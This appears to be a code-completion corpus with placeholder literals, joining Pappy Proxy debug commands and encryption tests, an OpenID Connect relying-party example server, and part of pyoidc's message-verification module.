_last_used : <EOL> last_used = Request . cache . _last_used [ reqid ] <EOL> else : <EOL> last_used = '<STR_LIT>' <EOL> in_all = reqid in Request . cache . all_ids <EOL> in_unmangled = reqid in Request . cache . unmangled_ids <EOL> try : <EOL> ordered_ids_pos = Request . cache . ordered_ids . index ( reqid ) <EOL> except ValueError : <EOL> ordered_ids_pos = '<STR_LIT>' <EOL> in_inmem = reqid in Request . cache . inmem_reqs <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' % reqid <EOL> print '<STR_LIT>' % cached <EOL> print '<STR_LIT>' % last_used <EOL> print '<STR_LIT>' % in_all <EOL> print '<STR_LIT>' % in_unmangled <EOL> print '<STR_LIT>' % ordered_ids_pos <EOL> print '<STR_LIT>' % in_inmem <EOL> print '<STR_LIT>' <EOL> def check_cache ( line ) : <EOL> Request . cache . assert_ids ( ) <EOL> def load_cmds ( cmd ) : <EOL> cmd . set_cmds ( { <EOL> '<STR_LIT>' : ( cache_info , None ) , <EOL> '<STR_LIT>' : ( heap_info , None ) , <EOL> '<STR_LIT>' : ( limit_info , None ) , <EOL> '<STR_LIT>' : ( heapdo , None ) , <EOL> '<STR_LIT>' : ( collect , None ) , <EOL> '<STR_LIT>' : ( graph_randobj , None ) , <EOL> '<STR_LIT>' : ( memory_info , None ) , <EOL> '<STR_LIT>' : ( big_fucking_data_file , None ) , <EOL> '<STR_LIT>' : ( check_cache , None ) , <EOL> '<STR_LIT>' : ( loadblock , None ) , <EOL> '<STR_LIT:time>' : ( time_cmd , None ) , <EOL> '<STR_LIT>' : ( cache_data , None ) , <EOL> } ) <EOL> cmd . add_aliases ( [ <EOL> ] ) </s>
<s> import os <EOL> import pytest <EOL> import random <EOL> import string <EOL> from pappyproxy . session import Session <EOL> from pappyproxy . crypto import Crypto <EOL> from pappyproxy . config import PappyConfig <EOL> @ pytest . fixture <EOL> def conf ( ) : <EOL> c = PappyConfig ( ) <EOL> return c <EOL> @ pytest . fixture <EOL> def crypt ( ) : <EOL> c = Crypto ( conf ( ) ) <EOL> return c <EOL> @ pytest . fixture <EOL> def tmpname ( ) : <EOL> cns = string . ascii_lowercase + string . ascii_uppercase + string . digits <EOL> tn = '<STR_LIT>' <EOL> for i in xrange ( <NUM_LIT:8> ) : <EOL> tn += cns [ random . randint ( <NUM_LIT:0> , len ( cns ) - <NUM_LIT:1> ) ] <EOL> return tn <EOL> tmpdir = '<STR_LIT>' + tmpname ( ) <EOL> tmpfiles = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> tmp_pass = '<STR_LIT>' <EOL> def stub_files ( ) : <EOL> enter_tmpdir ( ) <EOL> for sf in tmpfiles : <EOL> with os . fdopen ( os . open ( sf , os . O_CREAT , <NUM_LIT> ) , '<STR_LIT:r>' ) : <EOL> pass <EOL> def enter_tmpdir ( ) : <EOL> if not os . path . isdir ( tmpdir ) : <EOL> os . mkdir ( tmpdir ) <EOL> os . chdir ( tmpdir ) <EOL> def test_decrypt_tmpdir ( ) : <EOL> enter_tmpdir ( ) <EOL> c = crypt ( ) <EOL> c . password = tmp_pass <EOL> c . decrypt_project ( ) <EOL> assert os . path . isdir ( os . path . join ( os . getcwd ( ) , '<STR_LIT>' ) ) <EOL> def test_decrypt_copy_files ( ) : <EOL> enter_tmpdir ( ) <EOL> stub_files ( ) <EOL> c = crypt ( ) <EOL> c . password = tmp_pass <EOL> c . decrypt_project ( ) <EOL> for tf in tmpfiles : <EOL> assert os . path . isfile ( os . path . join ( os . getcwd ( ) , tf ) ) </s>
<s> import argparse <EOL> import cherrypy <EOL> import os <EOL> from oic . oauth2 import rndstr <EOL> from oic . oic import Client <EOL> from oic . oic . message import AuthorizationResponse <EOL> import yaml <EOL> __author__ = '<STR_LIT>' <EOL> class OIDCExampleRP ( object ) : <EOL> def __init__ ( self , client_metadata , behaviour ) : <EOL> self . client_metadata = client_metadata <EOL> self . behaviour = behaviour <EOL> self . redirect_uri = self . client_metadata [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . response_type = self . client_metadata [ "<STR_LIT>" ] [ <NUM_LIT:0> ] <EOL> self . behaviour = self . behaviour <EOL> def register_with_dynamic_provider ( self , session , uid ) : <EOL> issuer_url = session [ "<STR_LIT>" ] . wf . discovery_query ( uid ) <EOL> provider_info = session [ "<STR_LIT>" ] . provider_config ( issuer_url ) <EOL> session [ "<STR_LIT>" ] . register ( provider_info [ "<STR_LIT>" ] , <EOL> ** self . client_metadata ) <EOL> def make_authentication_request ( self , session ) : <EOL> session [ "<STR_LIT:state>" ] = rndstr ( ) <EOL> session [ "<STR_LIT>" ] = rndstr ( ) <EOL> request_args = { <EOL> "<STR_LIT>" : self . response_type , <EOL> "<STR_LIT:state>" : session [ "<STR_LIT:state>" ] , <EOL> "<STR_LIT>" : session [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : self . redirect_uri <EOL> } <EOL> request_args . update ( self . behaviour ) <EOL> auth_req = session [ "<STR_LIT>" ] . construct_AuthorizationRequest ( <EOL> request_args = request_args ) <EOL> login_url = auth_req . request ( session [ "<STR_LIT>" ] . authorization_endpoint ) <EOL> raise cherrypy . HTTPRedirect ( login_url , <NUM_LIT> ) <EOL> def parse_authentication_response ( self , session , query_string ) : <EOL> auth_response = session [ "<STR_LIT>" ] . 
parse_response ( AuthorizationResponse , <EOL> info = query_string , <EOL> sformat = "<STR_LIT>" ) <EOL> if auth_response [ "<STR_LIT:state>" ] != session [ "<STR_LIT:state>" ] : <EOL> raise "<STR_LIT>" <EOL> if "<STR_LIT>" in auth_response and auth_response [ "<STR_LIT>" ] [ "<STR_LIT>" ] != session [ "<STR_LIT>" ] : <EOL> raise "<STR_LIT>" <EOL> return auth_response <EOL> def make_token_request ( self , session , auth_code ) : <EOL> args = { <EOL> "<STR_LIT:code>" : auth_code , <EOL> "<STR_LIT>" : self . redirect_uri , <EOL> "<STR_LIT>" : session [ "<STR_LIT>" ] . client_id , <EOL> "<STR_LIT>" : session [ "<STR_LIT>" ] . client_secret <EOL> } <EOL> token_response = session [ "<STR_LIT>" ] . do_access_token_request ( <EOL> scope = "<STR_LIT>" , <EOL> state = session [ <EOL> "<STR_LIT:state>" ] , <EOL> request_args = args ) <EOL> return token_response <EOL> def make_userinfo_request ( self , session , access_token ) : <EOL> userinfo_response = session [ "<STR_LIT>" ] . do_user_info_request ( <EOL> access_token = access_token ) <EOL> return userinfo_response <EOL> class RPServer ( object ) : <EOL> def __init__ ( self , client_metadata , behaviour , verify_ssl ) : <EOL> self . rp = OIDCExampleRP ( client_metadata , behaviour ) <EOL> self . verify_ssl = verify_ssl <EOL> @ cherrypy . expose <EOL> def index ( self ) : <EOL> return self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> @ cherrypy . expose <EOL> def authenticate ( self , uid ) : <EOL> cherrypy . session [ "<STR_LIT>" ] = Client ( verify_ssl = self . verify_ssl ) <EOL> self . rp . register_with_dynamic_provider ( cherrypy . session , uid ) <EOL> redirect_url = self . rp . make_authentication_request ( cherrypy . session ) <EOL> raise cherrypy . HTTPRedirect ( redirect_url , <NUM_LIT> ) <EOL> @ cherrypy . expose <EOL> def repost_fragment ( self , ** kwargs ) : <EOL> response = self . rp . parse_authentication_response ( cherrypy . session , <EOL> kwargs [ "<STR_LIT>" ] ) <EOL> html_page = self . 
_load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> authz_code = None <EOL> try : <EOL> authz_code = response [ "<STR_LIT:code>" ] <EOL> except KeyError : <EOL> pass <EOL> access_token = None <EOL> try : <EOL> access_token = response [ "<STR_LIT>" ] <EOL> userinfo = self . rp . make_userinfo_request ( cherrypy . session , <EOL> access_token ) <EOL> except KeyError : <EOL> pass <EOL> return html_page . format ( authz_code , access_token , <EOL> response [ "<STR_LIT>" ] , userinfo ) <EOL> @ cherrypy . expose <EOL> def code_flow ( self , ** kwargs ) : <EOL> if "<STR_LIT:error>" in kwargs : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , "<STR_LIT>" . format ( kwargs [ "<STR_LIT:error>" ] , <EOL> kwargs [ <EOL> "<STR_LIT>" ] ) ) <EOL> qs = cherrypy . request . query_string <EOL> auth_response = self . rp . parse_authentication_response ( cherrypy . session , <EOL> qs ) <EOL> auth_code = auth_response [ "<STR_LIT:code>" ] <EOL> token_response = self . rp . make_token_request ( cherrypy . session , auth_code ) <EOL> userinfo = self . rp . make_userinfo_request ( cherrypy . session , <EOL> token_response [ "<STR_LIT>" ] ) <EOL> html_page = self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> return html_page . format ( auth_code , token_response [ "<STR_LIT>" ] , <EOL> token_response [ "<STR_LIT>" ] , userinfo ) <EOL> @ cherrypy . expose <EOL> def implicit_hybrid_flow ( self , ** kwargs ) : <EOL> return self . _load_HTML_page_from_file ( "<STR_LIT>" ) <EOL> def _load_HTML_page_from_file ( self , path ) : <EOL> if not path . startswith ( "<STR_LIT:/>" ) : <EOL> path = os . path . join ( os . path . dirname ( __file__ ) , path ) <EOL> with open ( path , "<STR_LIT:r>" ) as f : <EOL> return f . read ( ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT> , type = int ) <EOL> parser . 
add_argument ( "<STR_LIT>" , "<STR_LIT>" , default = "<STR_LIT>" , type = str ) <EOL> parser . add_argument ( "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> with open ( args . settings , "<STR_LIT:r>" ) as f : <EOL> settings = yaml . load ( f ) <EOL> baseurl = args . base . rstrip ( "<STR_LIT:/>" ) <EOL> registration_info = settings [ "<STR_LIT>" ] <EOL> registration_info [ "<STR_LIT>" ] = [ url . format ( base = baseurl ) for url in <EOL> registration_info [ "<STR_LIT>" ] ] <EOL> rp_server = RPServer ( registration_info , settings [ "<STR_LIT>" ] , <EOL> settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> cherrypy . tree . mount ( rp_server , "<STR_LIT:/>" ) <EOL> cherrypy . config . update ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : args . port , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> if baseurl . startswith ( "<STR_LIT>" ) : <EOL> cherrypy . config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : settings [ "<STR_LIT>" ] [ "<STR_LIT:key>" ] , <EOL> '<STR_LIT>' : settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> } ) <EOL> cherrypy . engine . start ( ) <EOL> cherrypy . engine . block ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import inspect <EOL> import time <EOL> import urllib <EOL> import json <EOL> import logging <EOL> from future . backports . urllib . parse import urlparse <EOL> import six <EOL> from jwkest import jws <EOL> import sys <EOL> from oic . utils import time_util <EOL> from oic . oauth2 import message <EOL> from oic . exception import InvalidRequest <EOL> from oic . exception import NotForMe <EOL> from oic . exception import MessageException <EOL> from oic . exception import PyoidcError <EOL> from oic . oauth2 . exception import VerificationError <EOL> from oic . oauth2 . message import MissingRequiredValue <EOL> from oic . oauth2 . message import MissingRequiredAttribute <EOL> from oic . oauth2 . message import Message <EOL> from oic . oauth2 . message import SchemeError <EOL> from oic . oauth2 . message import NotAllowedValue <EOL> from oic . oauth2 . message import REQUIRED_LIST_OF_SP_SEP_STRINGS <EOL> from oic . oauth2 . message import SINGLE_OPTIONAL_JSON <EOL> from oic . oauth2 . message import SINGLE_OPTIONAL_STRING <EOL> from oic . oauth2 . message import OPTIONAL_LIST_OF_STRINGS <EOL> from oic . oauth2 . message import SINGLE_REQUIRED_STRING <EOL> from oic . oauth2 . message import OPTIONAL_LIST_OF_SP_SEP_STRINGS <EOL> from oic . oauth2 . message import SINGLE_OPTIONAL_INT <EOL> from oic . oauth2 . message import REQUIRED_LIST_OF_STRINGS <EOL> __author__ = '<STR_LIT>' <EOL> logger = logging . getLogger ( __name__ ) <EOL> NONCE_STORAGE_TIME = <NUM_LIT:4> * <NUM_LIT> <EOL> class AtHashError ( VerificationError ) : <EOL> pass <EOL> class CHashError ( VerificationError ) : <EOL> pass <EOL> class EXPError ( VerificationError ) : <EOL> pass <EOL> class IATError ( VerificationError ) : <EOL> pass <EOL> def json_ser ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> return json . dumps ( val ) <EOL> def json_deser ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> return json . 
loads ( val ) <EOL> def json_conv ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> if isinstance ( val , dict ) : <EOL> for key , _val in val . items ( ) : <EOL> if _val is None : <EOL> val [ key ] = "<STR_LIT:none>" <EOL> elif _val is True : <EOL> val [ key ] = "<STR_LIT:true>" <EOL> elif _val is False : <EOL> val [ key ] = "<STR_LIT:false>" <EOL> return val <EOL> def json_rest ( val , sformat = None , lev = <NUM_LIT:0> ) : <EOL> if isinstance ( val , dict ) : <EOL> for key , _val in val . items ( ) : <EOL> if _val == "<STR_LIT:none>" : <EOL> val [ key ] = None <EOL> elif _val == "<STR_LIT:true>" : <EOL> val [ key ] = True <EOL> elif _val == "<STR_LIT:false>" : <EOL> val [ key ] = False <EOL> return val <EOL> SINGLE_OPTIONAL_BOOLEAN = ( bool , False , None , None , False ) <EOL> SINGLE_OPTIONAL_JSON_WN = ( dict , False , json_ser , json_deser , True ) <EOL> SINGLE_OPTIONAL_JSON_CONV = ( dict , False , json_conv , json_rest , True ) <EOL> SINGLE_REQUIRED_INT = ( int , True , None , None , False ) <EOL> def idtoken_deser ( val , sformat = "<STR_LIT>" ) : <EOL> return IdToken ( ) . deserialize ( val , "<STR_LIT>" ) <EOL> def address_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> elif sformat == "<STR_LIT>" : <EOL> sformat = "<STR_LIT>" <EOL> return AddressClaim ( ) . deserialize ( val , sformat ) <EOL> def claims_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return Claims ( ) . deserialize ( val , sformat ) <EOL> def message_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . 
dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return Message ( ) . deserialize ( val , sformat ) <EOL> def msg_ser ( inst , sformat , lev = <NUM_LIT:0> ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if isinstance ( inst , dict ) or isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> else : <EOL> res = inst <EOL> elif sformat == "<STR_LIT>" : <EOL> if isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> elif isinstance ( inst , dict ) : <EOL> res = inst <EOL> elif isinstance ( inst , six . string_types ) : <EOL> res = inst <EOL> else : <EOL> raise MessageException ( "<STR_LIT>" % type ( inst ) ) <EOL> else : <EOL> raise PyoidcError ( "<STR_LIT>" , inst ) <EOL> return res <EOL> def msg_ser_json ( inst , sformat = "<STR_LIT>" , lev = <NUM_LIT:0> ) : <EOL> if lev : <EOL> sformat = "<STR_LIT>" <EOL> if sformat == "<STR_LIT>" : <EOL> if isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> elif isinstance ( inst , dict ) : <EOL> res = inst <EOL> else : <EOL> raise MessageException ( "<STR_LIT>" % type ( inst ) ) <EOL> else : <EOL> sformat = "<STR_LIT>" <EOL> if isinstance ( inst , dict ) or isinstance ( inst , Message ) : <EOL> res = inst . serialize ( sformat , lev ) <EOL> else : <EOL> res = inst <EOL> return res <EOL> def msg_list_ser ( insts , sformat , lev = <NUM_LIT:0> ) : <EOL> return [ msg_ser ( inst , sformat , lev ) for inst in insts ] <EOL> def claims_ser ( val , sformat = "<STR_LIT>" , lev = <NUM_LIT:0> ) : <EOL> if isinstance ( val , six . string_types ) : <EOL> item = val <EOL> elif isinstance ( val , list ) : <EOL> item = val [ <NUM_LIT:0> ] <EOL> else : <EOL> item = val <EOL> if isinstance ( item , Message ) : <EOL> return item . serialize ( method = sformat , lev = lev + <NUM_LIT:1> ) <EOL> if sformat == "<STR_LIT>" : <EOL> res = urllib . 
urlencode ( item ) <EOL> elif sformat == "<STR_LIT>" : <EOL> if lev : <EOL> res = item <EOL> else : <EOL> res = json . dumps ( item ) <EOL> elif sformat == "<STR_LIT>" : <EOL> if isinstance ( item , dict ) : <EOL> res = item <EOL> else : <EOL> raise MessageException ( "<STR_LIT>" % type ( item ) ) <EOL> else : <EOL> raise PyoidcError ( "<STR_LIT>" % sformat , val ) <EOL> return res <EOL> def registration_request_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return RegistrationRequest ( ) . deserialize ( val , sformat ) <EOL> def claims_request_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat == "<STR_LIT>" : <EOL> sformat = "<STR_LIT>" <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return ClaimsRequest ( ) . deserialize ( val , sformat ) <EOL> OPTIONAL_ADDRESS = ( Message , False , msg_ser , address_deser , False ) <EOL> OPTIONAL_LOGICAL = ( bool , False , None , None , False ) <EOL> OPTIONAL_MULTIPLE_Claims = ( Message , False , claims_ser , claims_deser , False ) <EOL> SINGLE_OPTIONAL_IDTOKEN = ( six . 
string_types , False , msg_ser , None , False ) <EOL> SINGLE_OPTIONAL_REGISTRATION_REQUEST = ( Message , False , msg_ser , <EOL> registration_request_deser , False ) <EOL> SINGLE_OPTIONAL_CLAIMSREQ = ( Message , False , msg_ser_json , claims_request_deser , <EOL> False ) <EOL> OPTIONAL_MESSAGE = ( Message , False , msg_ser , message_deser , False ) <EOL> REQUIRED_MESSAGE = ( Message , True , msg_ser , message_deser , False ) <EOL> SCOPE_CHARSET = [ ] <EOL> for char in [ '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> if isinstance ( char , tuple ) : <EOL> c = char [ <NUM_LIT:0> ] <EOL> while c <= char [ <NUM_LIT:1> ] : <EOL> SCOPE_CHARSET . append ( c ) <EOL> c = chr ( ord ( c ) + <NUM_LIT:1> ) <EOL> else : <EOL> SCOPE_CHARSET . append ( set ) <EOL> def check_char_set ( string , allowed ) : <EOL> for c in string : <EOL> if c not in allowed : <EOL> raise NotAllowedValue ( "<STR_LIT>" % c ) <EOL> class RefreshAccessTokenRequest ( message . RefreshAccessTokenRequest ) : <EOL> pass <EOL> class TokenErrorResponse ( message . TokenErrorResponse ) : <EOL> pass <EOL> class AccessTokenResponse ( message . AccessTokenResponse ) : <EOL> c_param = message . AccessTokenResponse . c_param . copy ( ) <EOL> c_param . update ( { "<STR_LIT>" : SINGLE_OPTIONAL_STRING } ) <EOL> def verify ( self , ** kwargs ) : <EOL> super ( AccessTokenResponse , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> args = { } <EOL> for arg in [ "<STR_LIT:key>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> try : <EOL> args [ arg ] = kwargs [ arg ] <EOL> except KeyError : <EOL> pass <EOL> idt = IdToken ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> if not idt . verify ( ** kwargs ) : <EOL> return False <EOL> self [ "<STR_LIT>" ] = idt <EOL> return True <EOL> class UserInfoRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> class AuthorizationResponse ( message . 
AuthorizationResponse , <EOL> message . AccessTokenResponse ) : <EOL> c_param = message . AuthorizationResponse . c_param . copy ( ) <EOL> c_param . update ( message . AccessTokenResponse . c_param ) <EOL> c_param . update ( { <EOL> "<STR_LIT:code>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_IDTOKEN , <EOL> } ) <EOL> def verify ( self , ** kwargs ) : <EOL> super ( AuthorizationResponse , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT>" in kwargs : <EOL> if kwargs [ "<STR_LIT>" ] not in self [ "<STR_LIT>" ] : <EOL> return False <EOL> if "<STR_LIT>" in self : <EOL> args = { } <EOL> for arg in [ "<STR_LIT:key>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> try : <EOL> args [ arg ] = kwargs [ arg ] <EOL> except KeyError : <EOL> pass <EOL> idt = IdToken ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> if not idt . verify ( ** kwargs ) : <EOL> raise VerificationError ( "<STR_LIT>" , idt ) <EOL> _alg = idt . jws_header [ "<STR_LIT>" ] <EOL> hfunc = "<STR_LIT>" + _alg [ - <NUM_LIT:3> : ] <EOL> if "<STR_LIT>" in self : <EOL> try : <EOL> assert "<STR_LIT>" in idt <EOL> except AssertionError : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , <EOL> idt ) <EOL> try : <EOL> assert idt [ "<STR_LIT>" ] == jws . left_hash ( <EOL> self [ "<STR_LIT>" ] , hfunc ) <EOL> except AssertionError : <EOL> raise AtHashError ( <EOL> "<STR_LIT>" , idt ) <EOL> if "<STR_LIT:code>" in self : <EOL> try : <EOL> assert "<STR_LIT>" in idt <EOL> except AssertionError : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , <EOL> idt ) <EOL> try : <EOL> assert idt [ "<STR_LIT>" ] == jws . left_hash ( self [ "<STR_LIT:code>" ] , hfunc ) <EOL> except AssertionError : <EOL> raise CHashError ( "<STR_LIT>" , idt ) <EOL> self [ "<STR_LIT>" ] = idt <EOL> return True <EOL> class AuthorizationErrorResponse ( message . 
AuthorizationErrorResponse ) : <EOL> c_allowed_values = message . AuthorizationErrorResponse . c_allowed_values . copy ( ) <EOL> c_allowed_values [ "<STR_LIT:error>" ] . extend ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> class AuthorizationRequest ( message . AuthorizationRequest ) : <EOL> c_param = message . AuthorizationRequest . c_param . copy ( ) <EOL> c_param . update ( <EOL> { <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_SP_SEP_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_CLAIMSREQ , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_JSON , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> ) <EOL> c_allowed_values = message . AuthorizationRequest . c_allowed_values . copy ( ) <EOL> c_allowed_values . update ( { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT:none>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> } ) <EOL> def verify ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( AuthorizationRequest , self ) . 
verify ( ** kwargs ) <EOL> args = { } <EOL> for arg in [ "<STR_LIT:key>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> try : <EOL> args [ arg ] = kwargs [ arg ] <EOL> except KeyError : <EOL> pass <EOL> if "<STR_LIT>" not in kwargs : <EOL> args [ "<STR_LIT>" ] = self [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in self : <EOL> if isinstance ( self [ "<STR_LIT>" ] , six . string_types ) : <EOL> oidr = OpenIDRequest ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> for key , val in oidr . items ( ) : <EOL> if key in self : <EOL> assert self [ key ] == val <EOL> self [ "<STR_LIT>" ] = oidr <EOL> if "<STR_LIT>" in self : <EOL> if isinstance ( self [ "<STR_LIT>" ] , six . string_types ) : <EOL> idt = IdToken ( ) . from_jwt ( str ( self [ "<STR_LIT>" ] ) , ** args ) <EOL> self [ "<STR_LIT>" ] = idt <EOL> if "<STR_LIT>" not in self : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , self ) <EOL> _rt = self [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in _rt or "<STR_LIT>" in _rt : <EOL> if "<STR_LIT>" not in self : <EOL> raise MissingRequiredAttribute ( "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" not in self . get ( "<STR_LIT>" , [ ] ) : <EOL> raise MissingRequiredValue ( "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" in self . get ( "<STR_LIT>" , [ ] ) : <EOL> if "<STR_LIT>" not in self or "<STR_LIT>" not in self [ "<STR_LIT>" ] : <EOL> raise MissingRequiredValue ( "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT:none>" in self [ "<STR_LIT>" ] and len ( self [ "<STR_LIT>" ] ) > <NUM_LIT:1> : <EOL> raise InvalidRequest ( "<STR_LIT>" , <EOL> self ) <EOL> return True <EOL> class AccessTokenRequest ( message . AccessTokenRequest ) : <EOL> c_param = message . AccessTokenRequest . c_param . copy ( ) <EOL> c_param . 
update ( { "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING } ) <EOL> c_default = { "<STR_LIT>" : "<STR_LIT>" } <EOL> c_allowed_values = { <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" ] , <EOL> } <EOL> class AddressClaim ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING } <EOL> class OpenIDSchema ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT:name>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT:email>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT:address>" : OPTIONAL_ADDRESS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : OPTIONAL_MESSAGE , <EOL> "<STR_LIT>" : OPTIONAL_MESSAGE } <EOL> def verify ( self , ** kwargs ) : <EOL> super ( OpenIDSchema , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> try : <EOL> _ = time . 